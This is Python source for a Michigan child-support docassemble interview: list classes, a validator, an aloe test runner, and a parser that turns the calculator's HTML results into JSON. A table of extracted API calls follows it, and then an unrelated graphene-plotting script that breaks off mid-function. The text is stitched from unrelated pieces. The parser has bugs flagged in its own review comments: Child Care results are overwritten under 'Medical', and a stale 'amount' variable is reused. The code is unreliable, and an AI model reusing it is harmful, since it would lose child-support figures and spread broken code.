__all__ = ['run_automation', 'noquote', 'number_with_max', 'retirement_index_increment', 'ParentDict', 'ChildrenList']
class ParentDict(DADict):
    """Dictionary of parents; entries are Individuals and gathering is manual."""
    def init(self, *pargs, **kwargs):
        super().init(*pargs, **kwargs)
        # Entries are Individual objects; the interview drives gathering itself.
        self.object_type = Individual
        self.auto_gather = False
class ChildrenList(DAList):
    """List of children in the case; gathered by count and sorted youngest first."""
    def init(self, *pargs, **kwargs):
        super().init(*pargs, **kwargs)
        # Each entry is an Individual; the total count is asked up front.
        self.object_type = Individual
        self.ask_number = True
    def hook_on_gather(self):
        # Group 'C' cases must include a child living with a non-parent custodian.
        if 'C' in value('child_support_group'):
            if not any(child.lives_with_non_parent_custodian for child in self.elements):
                force_ask('no_child_with_guardian')
    def hook_after_gather(self):
        # Most recent birthdate first, i.e. youngest child leads the list.
        self.sort(key=lambda child: child.birthdate, reverse=True)
def retirement_index_increment(parent):
    """Return 1 when the parent's estimated taxes involve a mandatory retirement contribution, else 0."""
    if parent.tax_method != 'estimated':
        return 0
    for source in parent.income_sources:
        # A wage source with a compulsory retirement percentage bumps the index.
        if (source.type == 'Employer Wages'
                and source.must_contribute_to_retirement
                and source.mandatory_percentage > 0):
            return 1
    return 0
def number_with_max(number, maximum):
    """Format *number* as a string, capping the display at *maximum* with a '+' suffix."""
    if number < maximum:
        return str(number)
    return str(maximum) + '+'
def noquote(text):
    """Validate that *text* contains only permitted characters; return True when clean.

    Raises a validation error when a disallowed character is present.
    """
    bad_character = re.search(r'[^A-Za-z\' 0-9\_\-\n\r]', text)
    if bad_character:
        raise validation_error("You are only allowed to type characters A-Z, a-z, 0-9, and -.")
    return True
def run_automation(feature_file, html_file, png_file, json_file, base_name):
    """Run the aloe/Gherkin automation for one feature file and collect its outputs.

    Copies the bundled feature/step sources into a temp directory, runs `aloe`
    there, then stores the resulting HTML (and PNG, when produced) into the
    supplied file objects and extracts a JSON summary from the HTML.

    :return: (success flag, combined console/log output, extracted data dict)
    """
    base_name = space_to_underscore(base_name)
    try:
        with tempfile.TemporaryDirectory(prefix='datemp') as temp_directory:
            output_file = os.path.join(temp_directory, 'output.html')
            output_png = os.path.join(temp_directory, 'output.png')
            # Stage the packaged features plus the caller's feature under test.
            features_directory = shutil.copytree(path_and_mimetype('data/sources/features')[0], os.path.join(temp_directory, 'features'))
            shutil.copyfile(feature_file, os.path.join(features_directory, 'calculate.feature'))
            Path(os.path.join(features_directory, '__init__.py')).touch()
            Path(os.path.join(features_directory, 'steps', '__init__.py')).touch()
            output = ''
            with open(feature_file, encoding='utf-8') as x:
                output += x.read()
            try:
                commands = ["aloe", "--stop", "--verbosity=3", "features/calculate.feature"]
                output += "\n\n" + ' '.join(commands) + "\n"
                #output += subprocess.check_output(["ls", "-lR"], cwd=temp_directory, stderr=subprocess.STDOUT).decode()
                output += subprocess.check_output(commands, cwd=temp_directory, stderr=subprocess.STDOUT).decode()
                success = True
            except subprocess.CalledProcessError as err:
                output += err.output.decode()
                success = False
            if success:
                if os.path.isfile(output_file):
                    html_file.initialize(filename=base_name + '.html')
                    html_file.copy_into(output_file)
                    html_file.commit()
                else:
                    success = False
                    output += "\nFile not found after process completed.\n"
                # The PNG is optional; its absence does not fail the run.
                if os.path.isfile(output_png):
                    png_file.initialize(filename=base_name + '.png')
                    png_file.copy_into(output_png)
                    png_file.commit()
                # else:
                #     success = False
                #     output += "\nPNG file not found after process completed.\n"
    except Exception as err:
        success = False
        output = err.__class__.__name__ + ": " + str(err)
    if success:
        try:
            # Parse the generated HTML into structured data and persist it as JSON.
            output_data = extract_data(html_file.path())
            json_file.initialize(filename=base_name + '.json')
            json_file.write(json.dumps(output_data, indent=2))
            json_file.commit()
        except Exception as err:
            success = False
            output += err.__class__.__name__ + ": " + str(err)
            output_data = {"error": err.__class__.__name__, "message": str(err)}
    else:
        output_data = {}
    return success, output, output_data
def process_table(table):
    """Convert a BeautifulSoup <table> element into a plain dict.

    :param table: the table element
    :return: {'title': ..., 'columns': [...], 'rows': [[...], ...], 'footer': [...]}
             where each cell value is normalized through fixup().
    """
    result = {
        'title': table.get('title', None),
        'columns': [head.get_text().strip()
                    for head in table.find_all('thead', recursive=False)],
        'rows': [],
        'footer': [],
    }
    for body in table.find_all('tbody', recursive=False):
        for row in body.find_all('tr', recursive=False):
            # One output row per <tr>, one fixed-up value per direct <td>.
            # (A dead `item = list()` local from the original has been removed.)
            result['rows'].append([fixup(col) for col in row.find_all('td', recursive=False)])
    result['footer'] = [foot.get_text().strip()
                        for foot in table.find_all('tfoot', recursive=False)]
    return result
def fixup(elem):
    """Normalize one BeautifulSoup table cell into a str/float or nested table data.

    Single-child wrappers are unwrapped; embedded tables are delegated to
    process_table(); recognized multi-child layouts are flattened to joined
    text; plain text is whitespace-normalized and dollar amounts of the exact
    form $N.NN are converted to float.
    """
    # <br> separators are ignored when counting the cell's direct children.
    children = [item for item in elem.find_all(recursive=False) if item.name != 'br']
    if len(children) == 1:
        orig_elem = elem
        elem = children[0]
        #log("kids1: found a " + elem.name + " with " + repr(elem.get_text()))
        if elem.name == 'output':
            text = orig_elem.get_text().strip()
        elif elem.name == 'div':
            found = False
            tables = list()
            for table in elem.find_all('table'):
                found = True
                tables.append(process_table(table))
            # for head in table.find_all('thead', recursive=False):
            #     tables.append(head.get_text().strip())
            if found:
                return tables
            text = orig_elem.get_text().strip()
        elif elem.name == 'table':
            #tables = list()
            #for head in elem.find_all('thead', recursive=False):
            #    tables.append(head.get_text().strip())
            #return tables
            return process_table(elem)
        elif elem.name == 'input':
            text = elem.get('value')
        else:
            #log("doing get text and strip")
            text = elem.text.strip()
            #log("doing elem is" + repr(text))
            text = re.sub(r'<br/?>', ' ', text)
    elif len(children) == 2 and children[0].name == 'table' and children[1].name == 'table':
        return [process_table(children[0]), process_table(children[1])]
    elif len(children) == 2 and children[0].name == 'a' and children[1].name == 'label':
        text = children[1].get_text().strip()
    elif len(children) == 2 and children[0].name == 'output' and children[1].name == 'output':
        text = children[0].get_text().strip() + " " + children[1].get_text().strip()
    elif len(children) == 3 and children[0].name == 'div' and children[1].name == 'div' and children[2].name == 'div':
        #log("Triple div first kid is " + repr(str(children[0])))
        text = children[0].get_text().strip() + " " + children[1].get_text().strip() + " " + children[2].get_text().strip()
        #log("Triple div Got " + repr(text))
    elif len(children) == 2 and children[0].name == 'div' and children[1].name == 'div':
        text = children[0].get_text().strip() + " " + children[1].get_text().strip()
    elif len(children) == 2 and children[0].name == 'strong' and children[1].name == 'strong':
        text = children[0].get_text().strip() + " " + children[1].get_text().strip()
    elif len(children) == 2 and children[0].name == 'p' and children[1].name == 'p':
        text = children[0].get_text().strip() + " " + children[1].get_text().strip()
    elif len(children) == 2 and children[0].name == 'div' and children[1].name == 'p':
        text = children[1].get_text().strip()
    else:
        #log("found a " + elem.name + " with " + repr(elem.get_text()))
        #log("kids is " + ";".join(repr(item.name) for item in children))
        text = elem.decode_contents().strip()
        #log("elem is" + repr(text))
        text = re.sub(r'<br/?>', ' ', text)
    # Non-string results (nested table data, None from <input> without value)
    # pass through untouched.
    if not isinstance(text, str):
        return text
    # Collapse odd whitespace before checking for a dollar amount.
    # NOTE(review): the first re.sub appears intended to replace a non-breaking
    # space with a regular space -- confirm the pattern character.
    text = re.sub(r' ', ' ', text)
    text = re.sub(r' +', ' ', text)
    text = re.sub(r'\n\t+', ' ', text)
    text = text.strip()
    m = re.search(r'^\$([0-9]+\.[0-9][0-9])$', text)
    if m:
        text = float(m.group(1))
    return text
def nulltruefalse(item):
    """Normalize a scraped string into None/bool/int/float where possible.

    Non-strings and unrecognized strings are returned unchanged. Recognized
    forms: 'true'/'Yes' -> True, 'false'/'No' -> False, '-'/'' -> None,
    integer and decimal literals -> int/float, 'N%' -> fraction (N/100).
    """
    if not isinstance(item, str):
        return item
    if item in ('false', 'No'):
        return False
    if item in ('true', 'Yes'):
        return True
    if item in ('-', ''):
        return None
    if re.search(r'^\-?[0-9]+$', item):
        try:
            return int(item)
        except ValueError:  # narrowed from a bare except
            pass
    if '.' in item and re.search(r'^\-?[0-9\.]+$', item):
        try:
            return float(item)
        except ValueError:  # e.g. '1.2.3' matches the pattern but is not a float
            pass
    if re.search(r'^[0-9\.]+\%$', item):
        try:
            return float(item[0:-1])/100.0
        except ValueError:
            pass
    return item
def get_amount_potential(text):
    """Parse a money cell into an ``(amount, is_potential)`` tuple.

    ``is_potential`` is True when the cell carries the '(PC)' marker (a
    "potential" child-care amount).  A leading dollar figure such as
    '$123.45 (PC)' is converted to the float 123.45; text without a parsable
    dollar figure is returned unchanged.  Non-string input passes through
    with the flag False.

    Fix: replaced the bare ``except:`` with ``except ValueError`` (the only
    failure mode of float()) and collapsed the if/else into a boolean
    expression.
    """
    if not isinstance(text, str):
        return (text, False)
    potential = '(PC)' in text
    m = re.search(r'^\$([0-9\.]+)', text)
    if m:
        try:
            text = float(m.group(1))
        except ValueError:
            # e.g. '$.' — regex matched but not a valid float; keep the text
            pass
    return (text, potential)
def extract_data(filename):
    """Parse a saved Michigan child-support calculator results HTML page.

    Walks every ``#paymentRelationship<i>`` block, converts each section table
    into nested dicts, and returns::

        {'results': [per-relationship dict, ...],
         'information': {hidden-input id/name: normalized value},
         'summaries': [result link text, ...]}

    Relies on module-level helpers ``fixup``, ``nulltruefalse`` and
    ``get_amount_potential``, and on ``Soup`` (BeautifulSoup) being importable
    at module scope.
    """
    results = {"parts": [], "hidden": {}, "summary": []}
    with open(filename) as fp:
        s = Soup(fp.read(), "html.parser")
    # Collect every hidden form input, keyed by its id (preferred) or name.
    for inp in s.select('input[type="hidden"]'):
        results['hidden'][inp.get('id') or inp.get('name')] = inp.get('value')
    # The page shows at most three payment relationships (showResult0..2).
    for i in range(3):
        for div in s.select('#showResult' + str(i)):
            link_text = div.get_text().strip()
            link_text = re.sub(r'\s+', ' ', link_text)
            link_text = re.sub(r'Show Result [0-9]+: ', '', link_text)
            results['summary'].append(link_text)
        # First pass: turn each top-level <table> into {section heading: [rows]},
        # where each row is a list of fixup()-normalized cell values.
        for div in s.select('#paymentRelationship' + str(i)):
            result = {}
            for table in div.find_all('table', recursive=False):
                heading = None
                for head in table.find_all('thead', recursive=False):
                    heading = head.get_text().strip()
                if not heading:
                    raise Exception("Table has no heading")
                heading = re.sub(r'^Section:\s*', '', heading)
                result[heading] = []
                for body in table.find_all('tbody', recursive=False):
                    for row in body.find_all('tr', recursive=False):
                        item = list()
                        for col in row.find_all('td', recursive=False):
                            item.append(fixup(col))
                        result[heading].append(item)
            results['parts'].append(result)
    #log("Raw:")
    #log(json.dumps(results, indent=2))
    # Second pass: reshape each raw "part" into the structured output dict.
    main_output = {'results': [], 'information': {}, 'summaries': []}
    for part in results['parts']:
        output = dict()
        # NOTE(review): 'Medical' is read below (see part['Medical']) but is not
        # in this required-section list — a page missing it raises KeyError
        # instead of the friendlier message; confirm whether that is intended.
        for item in ('General Information', 'Eliminate Ordinary Medical Expenses', 'Calculation Results', 'Children', 'Financial', 'Base Support Calculation', 'Child Care'):
            if item not in part:
                raise Exception(item + " not found")
        # --- General Information: known label/value pairs laid out in one row ---
        for item in part['General Information']:
            if item[0] == 'Court Case Number' and len(item) >= 4:
                output['Court Case Number'] = item[1]
                if item[2] == 'Court Case County':
                    output['Court Case County'] = item[3]
            elif item[0] == 'Calculation Parties' and len(item) >= 4:
                output['Calculation Parties'] = [item[1], item[3]]
            elif item[0] == 'Description' and len(item) > 1:
                output['Description'] = item[1]
            elif item[0] == 'Michigan Child Support Formula Year' and len(item) >= 6:
                # Three label/value pairs packed into one six-cell row.
                output[item[0]] = item[1]
                output[item[2]] = item[3]
                output[item[4]] = item[5]
        # --- Eliminate Ordinary Medical Expenses: header row has an empty first cell ---
        headers = None
        for item in part['Eliminate Ordinary Medical Expenses']:
            if item[0] == "":
                headers = item[1:]
                break
        if headers is None:
            raise Exception("Could not find header row for Eliminate Ordinary Medical Expenses")
        subout = dict()
        for item in part['Eliminate Ordinary Medical Expenses']:
            if item[0] == "":
                continue
            if len(item) == 1 + len(headers):
                # Row label in column 0, one normalized value per header column.
                subsubout = dict()
                for i in range(len(headers)):
                    subsubout[headers[i]] = nulltruefalse(item[i + 1])
                subout[item[0]] = subsubout
            if len(item) == 2 and item[0] == 'Select Reason for Eliminating the Ordinary Medical Expense(s):':
                subout[item[0]] = item[1]
        output['Eliminate Ordinary Medical Expenses'] = subout
        # --- Calculation Results: same shape as the previous section ---
        headers = None
        for item in part['Calculation Results']:
            if item[0] == "":
                headers = item[1:]
                break
        if headers is None:
            raise Exception("Could not find header row for Calculation Results")
        subout = dict()
        for item in part['Calculation Results']:
            if item[0] == "":
                continue
            if len(item) == 1 + len(headers):
                subsubout = dict()
                for i in range(len(headers)):
                    subsubout[headers[i]] = nulltruefalse(item[i + 1])
                subout[item[0]] = subsubout
            if len(item) == 2 and item[0] == 'Select Reason for Eliminating the Ordinary Medical Expense(s):':
                subout[item[0]] = item[1]
        output['Calculation Results'] = subout
        # --- Children: per-child overnights plus a few summary rows ---
        headers = None
        for item in part['Children']:
            if item[0] == "Children's Overnights Spent Per Year":
                headers = item[1:]
                break
        if headers is None:
            raise Exception("Could not find header row for Children")
        subout = dict()
        overnights = dict()
        for item in part['Children']:
            if item[0] == "Children's Overnights Spent Per Year":
                continue
            if len(item) == 1 + len(headers):
                subsubout = dict()
                for i in range(len(headers)):
                    subsubout[headers[i]] = nulltruefalse(item[i + 1])
                if item[0] in ('Additional Children from Other Relationships', 'Child Support Children in Other Payment Relationships', 'Total Other Children', 'Income Adjustment Percentage Multiplier'):
                    # Summary rows keep the {header: value} shape.
                    subout[item[0]] = subsubout
                else:
                    # Child rows are pivoted: overnights[party][child name] = value.
                    for i in range(len(headers)):
                        if headers[i] not in overnights:
                            overnights[headers[i]] = dict()
                        overnights[headers[i]][item[0]] = nulltruefalse(item[i + 1])
        subout["Children's Overnights Spent Per Year"] = overnights
        output["Children"] = subout
        # --- Financial: mixes notes, key/value rows, per-party sub-tables and data rows ---
        subout = dict(notes=list())
        headers = None
        for item in part['Financial']:
            if item[0] == "See 2021 MCSF 2.01":
                headers = item[1:]
                break
        if headers is None:
            raise Exception("Could not find header row for Financial")
        for item in part['Financial']:
            if len(item) > 0 and isinstance(item[0], list):
                # A row of nested tables (one per party column), produced by fixup().
                if len(item[0]) > len(headers):
                    raise Exception("Unrecognized row of tables in Financial section. Expected " + str(len(headers)) + " and got " + str(len(item[0])) + " where content is " + repr(item[0]) + " and headers are " + repr(headers))
                for i in range(len(headers)):
                    if i >= len(item[0]):
                        continue
                    table = item[0][i]
                    if not isinstance(table, dict) or 'title' not in table or 'columns' not in table or 'rows' not in table:
                        raise Exception("Unrecognized table " + repr(table) + " in Financial section")
                    # Strip the 'Party N ' prefix so both parties share one title key.
                    table_title = re.sub(r'^Party [0-9]+ ', '', table['title'])
                    if table_title not in subout:
                        subout[table_title] = dict()
                    subsubout = dict()
                    for subitem in table['rows']:
                        if not len(subitem) == 2:
                            raise Exception("Unrecognized row in table in Financial section")
                        subsubout[subitem[0]] = subitem[1]
                    subout[table_title][headers[i]] = subsubout
            elif len(item) == 1 and isinstance(item[0], str):
                subout['notes'].append(item[0])
            elif len(item) == 2:
                subout[item[0]] = item[1]
            elif len(item) == 1 + len(headers):
                if item[0] in ("See 2021 MCSF 2.01", "Additional Deductions"):
                    continue
                subsubout = dict()
                for i in range(len(headers)):
                    subsubout[headers[i]] = nulltruefalse(item[i + 1])
                # NOTE(review): the first assignment is immediately overwritten —
                # dead statement left in place.
                label = item[0]
                label = re.sub(r' See 2021 MCSF 2.01', '', item[0])
                subout[label] = subsubout
        output["Financial"] = subout
        # --- Base Support Calculation: strictly header-shaped data rows ---
        subout = dict()
        headers = None
        for item in part['Base Support Calculation']:
            if item[0] == "See 2021 MCSF 3.02(A)":
                headers = item[1:]
                break
        if headers is None:
            raise Exception("Could not find header row for Base Support Calculation")
        for item in part['Base Support Calculation']:
            if not len(item) == 1 + len(headers):
                raise Exception("Unrecognized row in Base Support Calculation")
            if item[0] == "See 2021 MCSF 3.02(A)":
                continue
            subsubout = dict()
            for i in range(len(headers)):
                subsubout[headers[i]] = nulltruefalse(item[i + 1])
            subout[item[0]] = subsubout
        output["Base Support Calculation"] = subout
        # --- Child Care: per-child amount tables with optional 'Months' rows ---
        subout = dict(notes=list())
        reimbursement_end_dates = list()
        headers = None
        for item in part['Child Care']:
            if len(item) and item[0] == "See 2021 MCSF 3.06(C) and 2021 MCSF 3.06(D)":
                headers = item[1:]
                break
        if headers is None:
            raise Exception("Could not find header row for Child Care")
        for item in part['Child Care']:
            if len(item) > 0 and isinstance(item[0], list):
                if len(item[0]) != len(headers):
                    raise Exception("Unrecognized row of tables in Child Care section")
                for i in range(len(headers)):
                    table = item[0][i]
                    if not isinstance(table, dict) or 'title' not in table or 'columns' not in table or 'rows' not in table:
                        raise Exception("Unrecognized table " + repr(table) + " in Child Care section")
                    # A single-row table is an empty placeholder — skip it.
                    if len(table['rows']) == 1:
                        continue
                    table_title = re.sub(r'^Party [0-9]+ ', '', table['title'])
                    # Normalize a known title spelling variant between parties.
                    table_title = re.sub(r'Child Care Expense Information Table', 'Child Care Expenses Information Table', table_title)
                    if table_title not in subout:
                        subout[table_title] = dict()
                    subsubout = list()
                    for subitem in table['rows']:
                        if not len(subitem) == 2:
                            raise Exception("Unrecognized row in table in Child Care section")
                        if subitem[0] == 'Months':
                            # 'Months' annotates the immediately preceding child row.
                            if len(subsubout) == 0:
                                raise Exception("Unrecognized Months row in Child Care section")
                            subsubout[-1]['months'] = subitem[1]
                        else:
                            amount, is_potential = get_amount_potential(subitem[1])
                            subsubout.append({'child': subitem[0], 'amount': amount, 'potential': is_potential})
                    subout[table_title][headers[i]] = subsubout
            elif len(item) == 0:
                continue
            elif len(item) == 1 and isinstance(item[0], str):
                subout['notes'].append(item[0])
            elif len(item) == 2:
                reimbursement_end_dates.append({'child': item[0], 'date': item[1]})
            elif len(item) == 1 + len(headers):
                if item[0] == "See 2021 MCSF 3.06(C) and 2021 MCSF 3.06(D)":
                    continue
                subsubout = dict()
                for i in range(len(headers)):
                    subsubout[headers[i]] = nulltruefalse(item[i + 1])
                subout[item[0]] = subsubout
        subout["Reimbursement End Dates"] = reimbursement_end_dates
        # NOTE(review): this stores the Child Care data under "Medical", which the
        # real Medical section below then overwrites — the Child Care result is
        # lost. This looks like it should be output["Child Care"]; confirm against
        # downstream consumers before changing.
        output["Medical"] = subout
        # --- Medical: same table-walking shape as Child Care ---
        subout = dict(notes=list())
        headers = None
        for item in part['Medical']:
            if len(item) and item[0] == "See 2021 MCSF 3.05(C) See 2021 MCSF 3.04(B)":
                headers = item[1:]
                break
        if headers is None:
            raise Exception("Could not find header row for Medical")
        for item in part['Medical']:
            if len(item) > 0 and isinstance(item[0], list):
                if len(item[0]) != len(headers):
                    raise Exception("Unrecognized row of tables in Medical section")
                for i in range(len(headers)):
                    table = item[0][i]
                    if not isinstance(table, dict) or 'title' not in table or 'columns' not in table or 'rows' not in table:
                        raise Exception("Unrecognized table " + repr(table) + " in Medical section")
                    if len(table['rows']) == 1:
                        continue
                    table_title = re.sub(r'^Party [0-9]+ ', '', table['title'])
                    if table_title not in subout:
                        subout[table_title] = dict()
                    subsubout = list()
                    for subitem in table['rows']:
                        if not len(subitem) == 2:
                            raise Exception("Unrecognized row in table in Medical section")
                        # NOTE(review): `amount` here is a stale leftover from the
                        # Child Care loop above (NameError if that loop never ran);
                        # presumably this should parse subitem[1] — confirm.
                        subsubout.append({'child': subitem[0], 'amount': amount})
                    subout[table_title][headers[i]] = subsubout
                    if 'footer' in table:
                        subout[table_title + " Note"] = '\n'.join(table['footer'])
            elif len(item) == 0:
                continue
            elif len(item) == 1 and isinstance(item[0], str):
                subout['notes'].append(item[0])
            elif len(item) == 2:
                subout[item[0]] = item[1]
            elif len(item) == 1 + len(headers):
                if item[0] in ("See 2021 MCSF 3.05(C) See 2021 MCSF 3.04(B)", "Additional Out-of-pocket Medical Expenses Per Child"):
                    continue
                subsubout = dict()
                for i in range(len(headers)):
                    subsubout[headers[i]] = nulltruefalse(item[i + 1])
                subout[item[0]] = subsubout
        output["Medical"] = subout
        main_output['results'].append(output)
    # Normalize hidden inputs and copy the summary link texts into the output.
    for item, val in results['hidden'].items():
        main_output["information"][item] = nulltruefalse(val)
    for item in results['summary']:
        main_output['summaries'].append(item)
    return main_output
# if __name__ == "__main__":
# filename = 'mi-results.html'
# raw_data = extract_data('mi-results.html')
# print("Final:")
# print(json.dumps(raw_data, indent=2))
| [
"subprocess.check_output",
"tempfile.TemporaryDirectory",
"docassemble.base.util.value",
"docassemble.base.util.validation_error",
"json.dumps",
"os.path.join",
"docassemble.base.util.force_ask",
"docassemble.base.util.path_and_mimetype",
"os.path.isfile",
"docassemble.base.util.space_to_underscor... | [((1530, 1577), 're.search', 're.search', (['"""[^A-Za-z\\\\\' 0-9\\\\_\\\\-\\\\n\\\\r]"""', 'text'], {}), '("[^A-Za-z\\\\\' 0-9\\\\_\\\\-\\\\n\\\\r]", text)\n', (1539, 1577), False, 'import re\n'), ((1781, 1811), 'docassemble.base.util.space_to_underscore', 'space_to_underscore', (['base_name'], {}), '(base_name)\n', (1800, 1811), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((8368, 8393), 're.sub', 're.sub', (['"""\xa0"""', '""" """', 'text'], {}), "('\\xa0', ' ', text)\n", (8374, 8393), False, 'import re\n'), ((8403, 8427), 're.sub', 're.sub', (['""" +"""', '""" """', 'text'], {}), "(' +', ' ', text)\n", (8409, 8427), False, 'import re\n'), ((8440, 8468), 're.sub', 're.sub', (['"""\\\\n\\\\t+"""', '""" """', 'text'], {}), "('\\\\n\\\\t+', ' ', text)\n", (8446, 8468), False, 'import re\n'), ((8500, 8545), 're.search', 're.search', (['"""^\\\\$([0-9]+\\\\.[0-9][0-9])$"""', 'text'], {}), "('^\\\\$([0-9]+\\\\.[0-9][0-9])$', text)\n", (8509, 8545), False, 'import re\n'), ((9479, 9513), 're.search', 're.search', (['"""^\\\\$([0-9\\\\.]+)"""', 'text'], {}), "('^\\\\$([0-9\\\\.]+)', text)\n", (9488, 9513), False, 'import re\n'), ((1589, 1675), 'docassemble.base.util.validation_error', 'validation_error', (['"""You are only allowed to type characters A-Z, a-z, 0-9, and -."""'], {}), "(\n 'You are only allowed to type characters A-Z, a-z, 0-9, and -.')\n", (1605, 1675), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((8846, 8877), 're.search', 're.search', (['"""^\\\\-?[0-9]+$"""', 'item'], {}), "('^\\\\-?[0-9]+$', item)\n", (8855, 8877), False, 'import re\n'), ((9136, 9169), 're.search', 're.search', (['"""^[0-9\\\\.]+\\\\%$"""', 'item'], {}), "('^[0-9\\\\.]+\\\\%$', item)\n", (9145, 9169), False, 'import 
re\n'), ((935, 970), 'docassemble.base.util.force_ask', 'force_ask', (['"""no_child_with_guardian"""'], {}), "('no_child_with_guardian')\n", (944, 970), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((1834, 1878), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {'prefix': '"""datemp"""'}), "(prefix='datemp')\n", (1861, 1878), False, 'import tempfile\n'), ((1924, 1967), 'os.path.join', 'os.path.join', (['temp_directory', '"""output.html"""'], {}), "(temp_directory, 'output.html')\n", (1936, 1967), False, 'import os\n'), ((1993, 2035), 'os.path.join', 'os.path.join', (['temp_directory', '"""output.png"""'], {}), "(temp_directory, 'output.png')\n", (2005, 2035), False, 'import os\n'), ((8997, 9031), 're.search', 're.search', (['"""^\\\\-?[0-9\\\\.]+$"""', 'item'], {}), "('^\\\\-?[0-9\\\\.]+$', item)\n", (9006, 9031), False, 'import re\n'), ((815, 843), 'docassemble.base.util.value', 'value', (['"""child_support_group"""'], {}), "('child_support_group')\n", (820, 843), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((2132, 2172), 'os.path.join', 'os.path.join', (['temp_directory', '"""features"""'], {}), "(temp_directory, 'features')\n", (2144, 2172), False, 'import os\n'), ((2216, 2269), 'os.path.join', 'os.path.join', (['features_directory', '"""calculate.feature"""'], {}), "(features_directory, 'calculate.feature')\n", (2228, 2269), False, 'import os\n'), ((3163, 3190), 'os.path.isfile', 'os.path.isfile', (['output_file'], {}), '(output_file)\n', (3177, 3190), False, 'import os\n'), ((3508, 3534), 'os.path.isfile', 'os.path.isfile', (['output_png'], {}), '(output_png)\n', (3522, 3534), False, 'import os\n'), ((4126, 4159), 'json.dumps', 'json.dumps', (['output_data'], {'indent': '(2)'}), '(output_data, indent=2)\n', (4136, 4159), 
False, 'import json\n'), ((10094, 10124), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'link_text'], {}), "('\\\\s+', ' ', link_text)\n", (10100, 10124), False, 'import re\n'), ((10153, 10198), 're.sub', 're.sub', (['"""Show Result [0-9]+: """', '""""""', 'link_text'], {}), "('Show Result [0-9]+: ', '', link_text)\n", (10159, 10198), False, 'import re\n'), ((2085, 2127), 'docassemble.base.util.path_and_mimetype', 'path_and_mimetype', (['"""data/sources/features"""'], {}), "('data/sources/features')\n", (2102, 2127), False, 'from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore\n'), ((10713, 10749), 're.sub', 're.sub', (['"""^Section:\\\\s*"""', '""""""', 'heading'], {}), "('^Section:\\\\s*', '', heading)\n", (10719, 10749), False, 'import re\n'), ((16529, 16573), 're.sub', 're.sub', (['"""^Party [0-9]+ """', '""""""', "table['title']"], {}), "('^Party [0-9]+ ', '', table['title'])\n", (16535, 16573), False, 'import re\n'), ((19572, 19616), 're.sub', 're.sub', (['"""^Party [0-9]+ """', '""""""', "table['title']"], {}), "('^Party [0-9]+ ', '', table['title'])\n", (19578, 19616), False, 'import re\n'), ((19652, 19756), 're.sub', 're.sub', (['"""Child Care Expense Information Table"""', '"""Child Care Expenses Information Table"""', 'table_title'], {}), "('Child Care Expense Information Table',\n 'Child Care Expenses Information Table', table_title)\n", (19658, 19756), False, 'import re\n'), ((22380, 22424), 're.sub', 're.sub', (['"""^Party [0-9]+ """', '""""""', "table['title']"], {}), "('^Party [0-9]+ ', '', table['title'])\n", (22386, 22424), False, 'import re\n'), ((2288, 2335), 'os.path.join', 'os.path.join', (['features_directory', '"""__init__.py"""'], {}), "(features_directory, '__init__.py')\n", (2300, 2335), False, 'import os\n'), ((2362, 2418), 'os.path.join', 'os.path.join', (['features_directory', '"""steps"""', '"""__init__.py"""'], {}), "(features_directory, 
'steps', '__init__.py')\n", (2374, 2418), False, 'import os\n'), ((2865, 2944), 'subprocess.check_output', 'subprocess.check_output', (['commands'], {'cwd': 'temp_directory', 'stderr': 'subprocess.STDOUT'}), '(commands, cwd=temp_directory, stderr=subprocess.STDOUT)\n', (2888, 2944), False, 'import subprocess\n'), ((6500, 6527), 're.sub', 're.sub', (['"""<br/?>"""', '""" """', 'text'], {}), "('<br/?>', ' ', text)\n", (6506, 6527), False, 'import re\n'), ((17583, 17625), 're.sub', 're.sub', (['""" See 2021 MCSF 2.01"""', '""""""', 'item[0]'], {}), "(' See 2021 MCSF 2.01', '', item[0])\n", (17589, 17625), False, 'import re\n'), ((8274, 8301), 're.sub', 're.sub', (['"""<br/?>"""', '""" """', 'text'], {}), "('<br/?>', ' ', text)\n", (8280, 8301), False, 'import re\n')] |
#! /usr/bin/env python3
import sys
import argparse
from graphenetools import gt
def create_parser():
    """Build the argument parser for the C1/3 commensurate-phase plotting tool.

    Positional ``m``/``n`` pick the simulation cell; the options control strain,
    lattice geometry, matplotlib styling and where (if anywhere) to save the
    figure.
    """
    parser = argparse.ArgumentParser(description="Plot graphene lattice and C1/3 phase corresponding to printed command line arguments for uniaxially strained graphene (for use with QMC software located at https://code.delmaestro.org)",
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter
                                     )
    # (name-or-flag, add_argument keywords) pairs, registered in display order.
    argument_spec = [
        ("m", dict(type=int,
                   help="Simulation cell parameter to generate `2*m*n` C1/3 adsorption sites")),
        ("n", dict(type=int,
                   help="Simulation cell parameter to generate `2*m*n` C1/3 adsorption sites")),
        ("--strain", dict(type=float, default=0.0,
                          help="Value of strain in armchair direction")),
        ("--carbon_carbon_distance", dict(type=float, default=1.42,
                                          help="Distance in angstrom between adjacent carbon atoms in isotropic graphene")),
        ("--poisson_ratio", dict(type=float, default=0.165,
                                 help="Poisson's ratio, (the ratio of transverse contraction strain to longitudinal extension strain in the direction of the stretching force) for graphene")),
        ("--mplstylefile", dict(type=str, default="default",
                                help='Location of stylefile to use with plotting')),
        ("--dpi", dict(type=float, default=None,
                       help="DPI of saved plot. Defaults to `rcParams[\"savefig.dpi\"]`")),
        ("--savefig", dict(type=str, default="",
                           help="Location to save plot. Image type based on extension. Will not save if empty.")),
    ]
    for name, keywords in argument_spec:
        parser.add_argument(name, **keywords)
    return parser
def main(argv=None):
    """
    :desc: Print command line arguments for uniaxially strained graphene and use with QMC software located at https://code.delmaestro.org

    Parses the CLI (defaulting to sys.argv), prints the QMC command line,
    draws the lattice plot, optionally saves it, and returns 0.
    """
    arguments = sys.argv if argv is None else argv
    args = create_parser().parse_args(arguments[1:])
    # Shared geometry keywords for both the printed command and the plot.
    geometry = dict(carbon_carbon_distance=args.carbon_carbon_distance,
                    poisson_ratio=args.poisson_ratio)
